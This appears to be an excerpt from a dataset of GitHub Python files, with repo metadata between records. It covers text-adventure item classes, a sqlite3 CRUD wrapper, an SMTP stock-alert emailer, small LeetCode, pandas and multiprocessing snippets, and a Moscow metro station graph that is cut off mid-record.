#defaults\n self.attackDesc = \"You attack.\"\n\n super(Weapon, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def equip(self, player):\n if not(self.keywords in player.inventory):\n return \"I need to pick it up first.\"\n\n if player.mainHand == self:\n return \"That is already equipped.\"\n if self.size == 1:\n if player.mainHand == player.offHand:\n player.offHand = None\n player.mainHand = self\n return \"You equip the \" + self.name,True\n elif self.size == 2:\n player.mainHand = self\n player.offHand = self\n return \"You equip the \" + self.name,True\n\n def attack(self):\n pass\n \nclass RangedWeapon(Weapon):\n \n def __init__(self, name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, capacity, **kwargs):\n #required\n self.capacity = capacity\n\n #defaults\n self.ammoRemaining = capacity\n self.fireSound = None\n self.reloadSound = None\n self.emptySound = \"Sounds/Combat/EmptyGun.mp3\"\n self.rangeMod = [0,5,10,15]\n self.attackDesc = \"You open fire!\"\n\n super(RangedWeapon, self).__init__(name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs)\n #Me name es Wayne Purkle coz when I nommin' grapes day be PURKLE!!!\n def attack(self, enemy, player, attackType):\n if isinstance(enemy, Enemies.Enemy):\n sources = list()\n if attackType == \"heavy\":\n return \"You are not holding a melee weapon.\"\n \n if self.ammoRemaining <= 0:\n sources.append(pyglet.media.load(self.emptySound, streaming=False))\n #source.play()\n return \"You pull the trigger but nothing happens. 
Shit, it's empty...\", True, sources\n \n if self.fireSound:\n sources.append(pyglet.media.load(self.fireSound, streaming=False))\n #source.play()\n \n self.ammoRemaining -= 1\n hitChance = self.accuracy\n \n if enemy.distanceToPlayer == 1:\n hitChance -= self.rangeMod[0]\n elif enemy.distanceToPlayer == 2:\n hitChance -= self.rangeMod[1]\n elif enemy.distanceToPlayer == 3:\n hitChance -= self.rangeMod[2]\n \n if player.intoxication > 75:\n hitChance -= 25\n elif player.intoxication > 60:\n hitChance -= 15\n elif player.intoxication > 40:\n hitChance -= 10\n elif player.intoxication > 25:\n hitChance -= 5\n elif player.intoxication > 10:\n hitChance += 8\n elif player.intoxication > 1:\n hitChance += 5\n elif player.intoxication > 60:\n hitChance -= 5\n \n if enemy.stunnedTimer > 0:\n hitChance += 10\n else:\n hitChance -= enemy.rangedDodge\n \n if hitChance < 5:\n hitChance = 5\n \n attackRoll = randint(0, 100)\n if attackRoll <= hitChance:\n attackResult = enemy.takeHit(player, self, \"ranged\")\n try:\n resultString, enemySources = attackResult\n sources += enemySources\n except ValueError:\n resultString = attackResult\n else:\n resultString = self.attackDesc\n resultString += \"\\nYou miss!\"\n return resultString, True, sources\n else:\n return enemy.takeHit(player, self, attackType)\n\n def shoot(self, enemy, player):\n return self.attack(enemy, player, \"ranged\")\n \n def reload(self, player):\n sources = list()\n for item in player.inventory.itervalues():\n try:\n weaponType = item.weaponType\n except AttributeError:\n continue\n \n if self.name == weaponType:\n self.ammoRemaining = self.capacity\n item.destroy(player)\n if self.reloadSound:\n sources.append(pyglet.media.load(self.reloadSound, streaming=False))\n #source.play()\n\n return \"You reload the \" + self.name + \".\",True, sources\n \n return \"You don't have any ammo.\"\n \n def lookAt(self):\n resultString = self.description + \"\\n\"\n resultString += \"It has \" + str(self.ammoRemaining) + \" shots remaining.\"\n return resultString\n \nclass MeleeWeapon(Weapon):\n\n def __init__(self, name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs):\n #required\n\n #defaults\n self.stunLength = 2\n self.defenseBonus = 0\n self.stunChance = 20\n self.hitSound = None\n self.missSound = \"Sounds/Combat/MeleeMiss.mp3\"\n self.attackDesc = \"You swing your weapon!\"\n \n super(MeleeWeapon, self).__init__(name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs) \n\n def attack(self, enemy, player, attackType):\n if isinstance(enemy, Enemies.Enemy):\n sources = list()\n if enemy.distanceToPlayer > 1:\n return \"You are not within striking distance.\"\n\n hitChance = self.accuracy\n #print \"Initial hit chance: \" + str(hitChance)\n \n if player.intoxication > 75:\n hitChance -= 20\n elif player.intoxication > 60:\n hitChance -= 15\n elif player.intoxication > 40:\n hitChance -= 10\n elif player.intoxication > 25:\n hitChance -= 5\n elif player.intoxication > 10:\n hitChance += 8\n elif player.intoxication > 1:\n hitChance += 5\n \n if attackType == \"heavy\":\n hitChance -= 25\n #print \"Heavy attack penalty. New hit chance: \" + str(hitChance)\n \n if enemy.helpless:\n hitChance = 100\n elif enemy.stunnedTimer > 0:\n hitChance += 15\n #print \"Enemy stunned bonus. New hit chance: \" + str(hitChance)\n else:\n hitChance -= enemy.meleeDodge\n #print \"enemy dodge penalty. 
New hit chance: \" + str(hitChance)\n \n if hitChance < 10:\n hitChance = 10\n attackRoll = randint(0, 100)\n #print \"Final hit chance: \" + str(hitChance)\n #print \"Attack roll: \" + str(attackRoll)\n if attackRoll <= hitChance:\n if self.hitSound:\n sources.append(pyglet.media.load(self.hitSound, streaming=False))\n #source.play()\n attackResult = enemy.takeHit(player, self, attackType)\n try:\n resultString, enemySources = attackResult\n sources += enemySources\n except ValueError:\n resultString = attackResult\n else:\n resultString = self.attackDesc\n resultString += \"\\nYou miss!\"\n if self.missSound:\n sources.append(pyglet.media.load(self.missSound, streaming=False))\n #source.play()\n return resultString, True, sources\n else:\n return enemy.takeHit(player, self, attackType)\n\n def shoot(self, enemy, player):\n return \"Try as you might, you can't find a good way to use your \" + player.mainHand.name + \" as a gun.\"\n\nclass Ammo(Item):\n \n def __init__(self, name, description, seenDescription, keywords, weaponType, **kwargs):\n self.weaponType = weaponType\n super(Ammo, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \nclass Usable(Item):\n \n def __init__(self, name, description, seenDescription, keywords, useDescription, **kwargs):\n self.useDescription = useDescription\n super(Usable, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \nclass Drinkable(Usable):\n \n def __init__(self, name, description, seenDescription, keywords, useDescription, **kwargs):\n super(Drinkable, self).__init__(name, description, seenDescription, keywords, useDescription, **kwargs)\n \nclass Alchohol(Drinkable):\n \n def __init__(self, name, description, seenDescription, keywords, useDescription, alcoholAmount, **kwargs):\n self.alcoholAmount = alcoholAmount\n\n kwargs.update({\n \"useSound\":\"Sounds/Misc/LiquorDrink.mp3\"\n })\n\n super(Alchohol, self).__init__(name, description, seenDescription, keywords, useDescription, **kwargs)\n \n def drink(self, player):\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n\n sources = list()\n\n sources.append(pyglet.media.load(self.useSound, streaming=False))\n player.increaseIntox(self.alcoholAmount)\n spiritDecrease = self.alcoholAmount / 2\n if spiritDecrease > 10:\n spiritDecrease = 10\n decreaseCap = player.spirit - 49\n if decreaseCap <= 0:\n decreaseCap = 0\n if decreaseCap < spiritDecrease:\n spiritDecrease = decreaseCap\n player.decreaseSpirit(spiritDecrease)\n self.currentLocation.removeItem(self)\n\n return self.useDescription,True, sources\n \nclass Food(Usable):\n\n def __init__(self, name, description, seenDescription, keywords, useDescription, intoxReduction, **kwargs):\n self.intoxReduction = intoxReduction\n\n kwargs.update({\n \"useSound\":None\n })\n\n super(Food, self).__init__(name, description, seenDescription, keywords, useDescription, **kwargs)\n\n def eat(self, player):\n sources = list()\n #sources.append(pyglet.media.load(self.useSound, streaming=False))\n\n player.decreaseIntox(self.intoxReduction)\n self.currentLocation.removeItem(self)\n\n return self.useDescription, True, sources\n\nclass Readable(Item):\n \n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n super(Readable, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def 
read(self):\n pass\n\nclass Note(Readable):\n \n def __init__(self, name, description, seenDescription, keywords, contents, **kwargs):\n self.contents = contents\n\n kwargs.update({\n \"pickupSound\":[\"Sounds/Misc/PaperGet1.mp3\",\"Sounds/Misc/PaperGet2.mp3\",\"Sounds/Misc/PaperGet3.mp3\"]\n })\n super(Note, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def read(self, player):\n sources = list()\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n \n sources.append(pyglet.media.load(self.pickupSound[randint(0, len(self.pickupSound) - 1)], streaming=False))\n #source.play()\n\n return self.contents,True, sources\n\nclass Key(Item):\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n\n kwargs.update({\n \"pickupSound\":[\"Sounds/Misc/KeyGet.mp3\"]\n })\n\n super(Key, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def use(self, player):\n return \"Use the key on what?\"\n \n def useOn(self, player, recipient):\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n \n try:\n if recipient.isAccessible:\n return recipient.tryLock(self, player)\n else:\n return recipient.tryUnlock(self, player)\n except AttributeError:\n return \"It doesn't have a lock to put the key in...\"\n\nclass Corpse(Item):\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n self.itemsContained = {}\n super(Corpse, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def get(self, holder, player):\n return \"I've no desire to carry around a corpse.\"\n\n def wear(self, player):\n return \"Assuming you could even lift that, you doubt wearing a corpse will improve your fighting ability much.\"\n\n def equip(self, player):\n return \"Though the idea of beating a demon to death with a dead body is incredibly metal, it doesn't seem very practical.\"\n\n def addItem(self, itemToAdd):\n if itemToAdd.keywords in self.itemsContained:\n if itemToAdd.stackable:\n self.itemsContained[itemToAdd.keywords].quantity += itemToAdd.quantity\n else:\n self.itemsContained[itemToAdd.keywords].quantity += 1\n else:\n self.itemsContained[itemToAdd.keywords] = itemToAdd\n itemToAdd.currentLocation = self\n\n def removeItem(self, itemToRemove):\n if (self.itemsContained[itemToRemove.keywords].quantity > 1) and (not itemToRemove.stackable):\n self.itemsContained[itemToRemove.keywords].quantity -= 1\n else:\n del self.itemsContained[itemToRemove.keywords]\n itemToRemove.currentLocation = None\n\n def search(self, player):\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n\n itemsToRemove = []\n resultString = \"You look the body over.\"\n if self.itemsContained:\n for item in self.itemsContained.itervalues(): #Display all the visible items\n if item.firstSeen and item.initSeenDesc:\n resultString += \"\\n\" + item.initSeenDesc\n elif item.firstTaken and item.notTakenDesc:\n resultString += \"\\n\" + item.notTakenDesc\n else:\n resultString += 
\"\\n\" + item.seenDescription\n\n if item.quantity > 1:\n resultString += \" (\" + str(item.quantity) + \")\"\n item.firstSeen = False\n\n self.currentLocation.addItem(item)\n itemsToRemove.append(item.keywords)\n\n for keywords in itemsToRemove:\n del self.itemsContained[keywords]\n else:\n resultString += \"\\nYou don't find anything of interest.\"\n\n return resultString, True","repo_name":"ThomasProtheroe/TextSurvivalHorror","sub_path":"Main/Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":22276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22223876551","text":"import sqlite3 #import the sqlite3 module to be used.\nimport traceback\n\nclass Banco():\n def __init__(self):\n self.conn = sqlite3.connect(\"meubanco.db\")\n\n def __del__(self):\n self.conn.close()\n\n def select(self, sqlstatement):\n \"\"\"Seleciona registros do banco de dados a partir de um parâmetro\"\"\"\n self.__cursor = self.conn.cursor()\n\n try:\n self.__cursor.execute(sqlstatement)\n \n except sqlite3.OperationalError:\n print (\"Erro. Verifique seu SQL\")\n\n self.dados = self.__cursor.fetchall()\n\n def select_one(self, id):\n self.__cursor = self.conn.cursor()\n\n sqlstatement = \"Select * from produto where id=?\"\n\n try:\n self.__cursor.execute(sqlstatement,id)\n except sqlite3.OperationalError:\n print (\"Erro. Verifique seu SQL\")\n\n self.dados = self.__cursor.fetchall()\n\n\n def create(self):\n self.__cursor = self.conn.cursor()\n try:\n sqlstatement = \"drop table if exists produto\"\n self.__cursor.execute(sqlstatement)\n sqlstatement = \"CREATE TABLE produto (id INTEGER PRIMARY KEY AUTOINCREMENT, Nome_do_Produto TEXT (255), Quantidade TEXT (10), Valor TEXT (10) );\"\n self.__cursor.execute(sqlstatement) \n \n except sqlite3.OperationalError:\n #print Exception.\n print (\"Erro. Verifique seu SQL\")\n\n self.conn.commit()\n\n\n def insert(self,dados):\n self.__cursor = self.conn.cursor()\n sqlstatement = \"INSERT INTO produto (Nome_do_Produto, Quantidade, Valor) VALUES (?,?,?)\"\n try:\n self.__cursor.execute(sqlstatement, dados)\n\n except sqlite3.OperationalError:\n print (\"Erro. Verifique seu SQL\")\n\n self.conn.commit()\n\n def update(self,dados):\n self.__cursor = self.conn.cursor()\n sqlstatement = \"\"\"UPDATE produto \n SET Nome_do_Produto=?, Quantidade=?, Valor=? \n WHERE id=?\n \"\"\"\n\n try:\n self.__cursor.execute(sqlstatement, dados)\n\n except sqlite3.Error as er:\n print('SQLite error: %s' % (' '.join(er.args)))\n print(\"Exception class is: \", er.__class__)\n print('SQLite traceback: ')\n exc_type, exc_value, exc_tb = sys.exc_info()\n print(traceback.format_exception(exc_type, exc_value, exc_tb))\n\n self.conn.commit()\n\n\n def delete(self,id):\n self.__cursor = self.conn.cursor()\n sqlstatement = \"DELETE FROM produto where ID=?\"\n try:\n self.__cursor.execute(sqlstatement, id)\n\n except sqlite3.OperationalError:\n print (\"Erro. 
Verifique seu SQL\")\n\n self.conn.commit()","repo_name":"jonasgueiros/projetos","sub_path":"uemg/atv4POO2/banco.py","file_name":"banco.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74476392694","text":"import smtplib\nimport json\nfrom email.mime.text import MIMEText\n\n\ndef send_email(recipient_email, subject, out_of_stock_items):\n \"\"\"Sends user email of a table for all out of stock items\"\"\"\n with open('creds.json', 'r') as file:\n creds = json.load(file)\n smtp_creds = creds['aws_smtp']\n smtp_server = smtp_creds['server']\n smtp_port = smtp_creds['port']\n smtp_username = smtp_creds['username']\n smtp_password = smtp_creds['password']\n\n html_content = \"\"\"\n \n \n \n \n \n
<html>\n    <body>\n    <h2>Out of Stock Products</h2>\n    <table>\n    <tr>\n    <th>SKU</th>\n    <th>Product Name</th>\n    <th>Cost Price</th>\n    <th>RRP</th>\n    <th>Stock</th>\n    </tr>\n    \"\"\"\n    for item in out_of_stock_items:\n        sku = item.get('SKU', '-')\n        product_name = item.get('Product Name', '-')\n        cost_price = item.get('Cost Price', '-')\n        rrp = item.get('RRP', '-')\n        stock = item.get('Stock', '-')\n        html_content += (\n            f\"<tr><td>{sku}</td><td>{product_name}</td><td>{cost_price}</td>\"\n            f\"<td>{rrp}</td><td>{stock}</td></tr>\"\n        )\n\n    html_content += \"\"\"\n    </table>\n    </body>\n    </html>
\n \n \n \"\"\"\n\n msg = MIMEText(html_content, 'html')\n msg['Subject'] = subject\n msg['From'] = 'orders@tackletarts.uk'\n msg['To'] = recipient_email\n\n with smtplib.SMTP(smtp_server, smtp_port) as smtp_connection:\n smtp_connection.starttls()\n smtp_connection.login(smtp_username, smtp_password)\n smtp_connection.sendmail(msg['From'], [msg['To']], msg.as_string())\n","repo_name":"ouzifeng/CI_PP3_FISHING_TACKLE_MANAGEMENT_APPLICATION","sub_path":"email_service.py","file_name":"email_service.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29496614446","text":"class Solution:\n def putMarbles(self, weights: List[int], k: int) -> int:\n n=len(weights)-1\n res=[0]*n\n for i in range(len(res)):\n res[i]=weights[i]+weights[i+1]\n res.sort()\n ans=0\n for i in range(k-1):\n ans+=res[n-1-i]-res[i]\n return ans","repo_name":"shivang257/LeetCode-Daily-Practice-Problem-Solutions","sub_path":"2551-put-marbles-in-bags/2551-put-marbles-in-bags.py","file_name":"2551-put-marbles-in-bags.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"1664569790","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nvehicle = pd.read_csv(r'D:\\迅雷下载\\vehicles.csv.zip')\n\nmask = vehicle.make.isin(\n [\"Ford\", \"Honda\", \"Tesla\", \"BMW\"]\n)\nprint(\n vehicle[mask].groupby('make').city08.agg(['mean','std'])\n .style.background_gradient(cmap=\"RdBu\", axis=0)\n)\nvehicle[mask].groupby('make').city08.agg(['mean', 'std']).style.background_gradient(cmap=\"RdBu\", axis=0)","repo_name":"DRAGONINWAVE/for_little_sun","sub_path":"《pandas_1.x_cookbook》/Chapter_4_Explotary_Data_Analysis/cool_style_background_gradient.py","file_name":"cool_style_background_gradient.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"11787187745","text":"from os import popen\nfrom multiprocess import pool\n\nimport time\n\n\ndef test(i):\n print(i)\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n lists = [i for i in range(1, 100)]\n pool = pool.Pool(processes=100) # 最大任务数\n pool.map(test, lists) # 参数是迭代类型\n pool.close() # 关闭池子开始运行\n pool.join() # 阻塞当前线程,直到返回\n","repo_name":"junknet/tcp-ip_notes","sub_path":"src/python/multiproces.py","file_name":"multiproces.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21842453297","text":"# Given two numbers, hour and minutes.\n# Return the smaller angle (in degrees) formed between the hour and the minute hand.\n\nclass Solution:\n def angleClock(self, hour: int, minutes: int) -> float:\n '''\n ideas:\n 360 degrees divided into 6 per min, 30 per hour\n find the minute position of the hour hand\n 12:30 = (6-0.5)*30 = 165\n 3:30 = (6-3.5)*30 = 75\n 3:15 = abs(3.25-3)*30 = 7.5\n 4:50 = abs(4+50/60-50/5)*30 = 155\n 12:00 = abs(12%12 + 0/60 - 0/5)*30 = 0\n\n 12:45 = 112.5\n '''\n return min(abs(hour % 12 + minutes / 60 - minutes / 5)*30, \\\n 360 - abs(hour % 12 + minutes / 60 - minutes / 5)*30)\n\nh = 12\nm = 46\nsol = 
Solution()\nprint(sol.angleClock(h,m))\n","repo_name":"JieFrye/leetcode","sub_path":"Math/AngleBetweenHandsofaClock.py","file_name":"AngleBetweenHandsofaClock.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5100732663","text":"def marks_calculate():\r\n while True:\r\n sh = float(input(\"Enter the number of hours you study\"))\r\n rank = input(\"How good are you at studying (low/below avg/avg/above avg/high)\")\r\n if (rank == \"low\"):\r\n marks = sh*10 - 10\r\n elif (rank == \"below avg\"):\r\n marks = sh*10 - 5\r\n elif (rank == \"avg\"):\r\n marks = sh*10\r\n elif (rank == \"above avg\"):\r\n if (sh <= 9.5):\r\n marks = sh*10 + 5\r\n else :\r\n marks = 100\r\n elif (rank == \"high\"):\r\n if (sh <= 9):\r\n marks = sh*10 + 10\r\n else :\r\n marks = 100\r\n else :\r\n print(\"the key enetered is not valid, please try again\")\r\n print(\"Your estimated marks is :\",marks)\r\n ans=input(\"Do you want to try again (yes/no)\")\r\n if (ans==\"yes\"):\r\n continue\r\n else:\r\n print(\"Thank You\")\r\n break\r\n\r\nmarks_calculate()\r\n \r\n","repo_name":"ParshantR/Marks-Calculators-","sub_path":"Parshant Ratawal GRIP task.py","file_name":"Parshant Ratawal GRIP task.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20546180042","text":"import re\r\n\r\nmetroTMP = {'Новоясеневская6' : [('Ясенево6',), 1000, '', False],\r\n 'Ясенево6' : [('Новоясеневская6', 'Теплый стан6'), 1000, '', False],\r\n 'Теплый стан6' : [('Ясенево6', 'Коньково6'), 1000, '', False],\r\n 'Коньково6': [('Теплый стан6', 'Беляево6'), 1000, '', False],\r\n 'Беляево6': [('Коньково6', 'Калужская6'), 1000, '', False],\r\n 'Калужская6': [('Беляево6', 'Новые черемушки6'), 1000, '', False],\r\n 'Новые черемушки6': [('Калужская6', 'Профсоюзная6'), 1000, '', False],\r\n 'Профсоюзная6': [('Новые черемушки6', 'Академическая6'), 1000, '', False],\r\n 'Академическая6': [('Профсоюзная6', 'Ленинский проспект6'), 1000, '', False],\r\n 'Ленинский проспект6': [('Академическая6', 'Шаболовская6'), 1000, '', False],\r\n 'Шаболовская6': [('Ленинский проспект6', 'Октябрьская6'), 1000, '', False],\r\n 'Октябрьская6': [('Октябрьская5', 'Третьяковская6', 'Шаболовская6'), 1000, '', False],\r\n 'Третьяковская6': [('Октябрьская6', 'Китай-город6', 'Новокузнецкая2', 'Третьяковская8'), 1000, '', False],\r\n 'Китай-город6': [('Третьяковская6', 'Тургеневская6', 'Китай-город7'), 1000, '', False],\r\n 'Тургеневская6': [('Китай-город6', 'Сухаревская6', 'Чистые пруды1', 'Сретенский бульвар10'), 1000, '', False],\r\n 'Сухаревская6': [('Тургеневская6', 'Проспект мира6'), 1000, '', False],\r\n 'Проспект мира6': [('Проспект мира5', 'Сухаревская6', 'Рижская6'), 1000, '', False],\r\n 'Рижская6': [('Проспект мира6', 'Алексеевская6'), 1000, '', False],\r\n 'Алексеевская6': [('Рижская6', 'ВДНХ6'), 1000, '', False],\r\n 'ВДНХ6': [('Алексеевская6', 'Ботанический сад6'), 1000, '', False],\r\n 'Ботанический сад6': [('ВДНХ6', 'Свиблово6'), 1000, '', False],\r\n 'Свиблово6': [('Ботанический сад6', 'Бабушкинская6'), 1000, '', False],\r\n 'Бабушкинская6': [('Свиблово6', 'Медведково6'), 1000, '', False],\r\n 'Медведково6': [('Бабушкинская6',), 1000, '', False],\r\n 'Бульвар Дмитрия Донского9' : [('Аннино9',), 1000, '', False],\r\n 'Аннино9' : [('Бульвар Дмитрия Донского9', 'Улица академика Янгеля9'), 1000, '', False],\r\n 'Улица академика Янгеля9' : [('Аннино9', 
'Пражская9'), 1000, '', False],\r\n 'Пражская9': [('Улица академика Янгеля9', 'Южная9'), 1000, '', False],\r\n 'Южная9': [('Пражская9', 'Чертановская9'), 1000, '', False],\r\n 'Чертановская9': [('Южная9', 'Севастопольская9'), 1000, '', False],\r\n 'Севастопольская9': [('Чертановская9', 'Нахимовский проспект9', 'Каховская11'), 1000, '', False],\r\n 'Нахимовский проспект9': [('Севастопольская9', 'Нагорная9'), 1000, '', False],\r\n 'Нагорная9': [('Нахимовский проспект9', 'Нагатинская9'), 1000, '', False],\r\n 'Нагатинская9': [('Нагорная9', 'Тульская9'), 1000, '', False],\r\n 'Тульская9': [('Нагатинская9', 'Серпуховская9'), 1000, '', False],\r\n 'Серпуховская9': [('Тульская9', 'Полянка9', 'Добрынинская5'), 1000, '', False],\r\n 'Полянка9': [('Серпуховская9', 'Боровицкая9'), 1000, '', False],\r\n 'Боровицкая9': [('Полянка9', 'Чеховская9', 'Библиотека имени Ленина1', 'Арбатская3', 'Александровский сад4'), 1000, '', False],\r\n 'Чеховская9': [('Боровицкая9', 'Цветной бульвар9', 'Тверская2', 'Пушкинская7'), 1000, '', False],\r\n 'Цветной бульвар9': [('Чеховская9', 'Менделеевская9', 'Трубная10'), 1000, '', False],\r\n 'Менделеевская9': [('Савеловская9', 'Цветной бульвар9'), 1000, '', False],\r\n 'Савеловская9': [('Менделеевская9', 'Дмитровская9'), 1000, '', False],\r\n 'Дмитровская9': [('Савеловская9', 'Тимирязевская9'), 1000, '', False],\r\n 'Тимирязевская9': [('Дмитровская9', 'Петровско-Разумовская9'), 1000, '', False],\r\n 'Петровско-Разумовская9': [('Тимирязевская9', 'Владыкино9'), 1000, '', False],\r\n 'Владыкино9': [('Петровско-Разумовская9', 'Отрадное9'), 1000, '', False],\r\n 'Отрадное9': [('Владыкино9', 'Бибирево9'), 1000, '', False],\r\n 'Бибирево9': [('Отрадное9', 'Алтуфьево9'), 1000, '', False],\r\n 'Алтуфьево9': [('Бибирево9',), 1000, '', False],\r\n 'Октябрьская5': [('Парк культуры5', 'Добрынинская5', 'Октябрьская6'), 1000, '', False],\r\n 'Парк культуры5' : [('Октябрьская5', 'Киевская5', 'Парк культуры1'), 1000, '', False],\r\n 'Киевская5': [('Парк культуры5', 'Краснопресненская5', 'Киевская3', 'Киевская4'), 1000, '', False],\r\n 'Краснопресненская5': [('Белорусская5', 'Киевская5'), 1000, '', False],\r\n 'Белорусская5': [('Краснопресненская5', 'Новослободская5', 'Белорусская2'), 1000, '', False],\r\n 'Новослободская5': [('Белорусская5', 'Проспект мира5', 'Менделеевская9'), 1000, '', False],\r\n 'Проспект мира5': [('Новослободская5', 'Комсомольская5', 'Проспект мира6'), 1000, '', False],\r\n 'Комсомольская5': [('Проспект мира5', 'Курская5', 'Комсомольская1'), 1000, '', False],\r\n 'Курская5': [('Комсомольская5', 'Таганская5', 'Курская3', 'Чкаловская10'), 1000, '', False],\r\n 'Таганская5': [('Курская5', 'Павелецкая5', 'Таганская7'), 1000, '', False],\r\n 'Добрынинская5': [('Октябрьская5', 'Павелецкая5','Серпуховская9'), 1000, '', False],\r\n 'Павелецкая5': [('Таганская5', 'Добрынинская5', 'Павелецкая2'), 1000, '', False],\r\n 'Саларьево1': [('Румянцево1',), 1000, '', False],\r\n 'Румянцево1': [('Саларьево1', 'Тропарево1'), 1000, '', False],\r\n 'Тропарево1': [('Румянцево1', 'Юго-Западная1'), 1000, '', False],\r\n 'Юго-Западная1': [('Тропарево1', 'Проспект Вернадского1'), 1000, '', False],\r\n 'Проспект Вернадского1': [('Юго-Западная1', 'Университет1'), 1000, '', False],\r\n 'Университет1': [('Проспект Вернадского1', 'Воробьевы горы1'), 1000, '', False],\r\n 'Воробьевы горы1': [('Университет1', 'Спортивная1'), 1000, '', False],\r\n 'Спортивная1': [('Воробьевы горы1', 'Фрунзенская1'), 1000, '', False],\r\n 'Фрунзенская1': [('Спортивная1', 'Парк культуры1'), 1000, '', False],\r\n 'Парк 
культуры1': [('Фрунзенская1', 'Кропоткинская1', 'Парк культуры5'), 1000, '', False],\r\n 'Кропоткинская1': [('Библиотека имени Ленина1', 'Парк культуры1'), 1000, '', False],\r\n 'Библиотека имени Ленина1': [('Кропоткинская1', 'Охотный ряд1', 'Боровицкая9', 'Арбатская3', 'Александровский сад4'), 1000, '', False],\r\n 'Охотный ряд1': [('Библиотека имени Ленина1', 'Лубянка1', 'Театральная2', 'Площадь революции3'), 1000, '', False],\r\n 'Лубянка1': [('Охотный ряд1', 'Чистые пруды1', 'Кузнецкий мост7'), 1000, '', False],\r\n 'Чистые пруды1': [('Лубянка1', 'Красные ворота1'), 1000, '', False],\r\n 'Красные ворота1': [('Чистые пруды1', 'Комсомольская1'), 1000, '', False],\r\n 'Комсомольская1': [('Красные ворота1', 'Комсомольская5', 'Красносельская1'), 1000, '', False],\r\n 'Красносельская1': [('Комсомольская1', 'Сокольники1'), 1000, '', False],\r\n 'Сокольники1': [('Красносельская1', 'Преображенская площадь1'), 1000, '', False],\r\n 'Преображенская площадь1': [('Сокольники1', 'Черкизовская1'), 1000, '', False],\r\n 'Черкизовская1': [('Преображенская площадь1', 'Бульвар Рокоссовского1'), 1000, '', False],\r\n 'Бульвар Рокоссовского1': [('Черкизовская1',), 1000, '', False],\r\n 'Алма-Атинская2': [('Красногвардейская2',), 1000, '', False],\r\n 'Красногвардейская2': [('Алма-Атинская2','Домодедовская2'), 1000, '', False],\r\n 'Домодедовская2': [('Красногвардейская2', 'Орехово2'), 1000, '', False],\r\n 'Орехово2': [('Домодедовская2', 'Царицыно2'), 1000, '', False],\r\n 'Царицыно2': [('Орехово2', 'Кантемировская2'), 1000, '', False],\r\n 'Кантемировская2': [('Царицыно2', 'Каширская2'), 1000, '', False],\r\n 'Каширская2': [('Кантемировская2', 'Коломенская2', 'Каширская11'), 1000, '', False],\r\n 'Коломенская2': [('Каширская2', 'Автозаводская2'), 1000, '', False],\r\n 'Автозаводская2': [('Коломенская2', 'Павелецкая2'), 1000, '', False],\r\n 'Павелецкая2': [('Автозаводская2', 'Новокузнецкая2', 'Павелецкая5'), 1000, '', False],\r\n 'Новокузнецкая2': [('Павелецкая2', 'Театральная2', 'Третьяковская6', 'Третьяковская8'), 1000, '', False],\r\n 'Театральная2': [('Новокузнецкая2', 'Тверская2', 'Охотный ряд1', 'Площадь революции3'), 1000, '', False],\r\n 'Тверская2': [('Театральная2', 'Маяковская2', 'Чеховская9', 'Пушкинская7'), 1000, '', False],\r\n 'Маяковская2': [('Тверская2', 'Белорусская2'), 1000, '', False],\r\n 'Белорусская2': [('Маяковская2', 'Динамо2', 'Белорусская5'), 1000, '', False],\r\n 'Динамо2': [('Белорусская2', 'Аэропорт2'), 1000, '', False],\r\n 'Аэропорт2': [('Динамо2', 'Сокол2'), 1000, '', False],\r\n 'Сокол2': [('Аэропорт2', 'Войковская2'), 1000, '', False],\r\n 'Войковская2': [('Сокол2', 'Водный стадион2'), 1000, '', False],\r\n 'Водный стадион2': [('Войковская2', 'Речной вокзал2'), 1000, '', False],\r\n 'Речной вокзал2': [('Водный стадион2',), 1000, '', False],\r\n 'Зябликово10': [('Шипиловская10',), 1000, '', False],\r\n 'Шипиловская10': [('Зябликово10','Борисово10'), 1000, '', False],\r\n 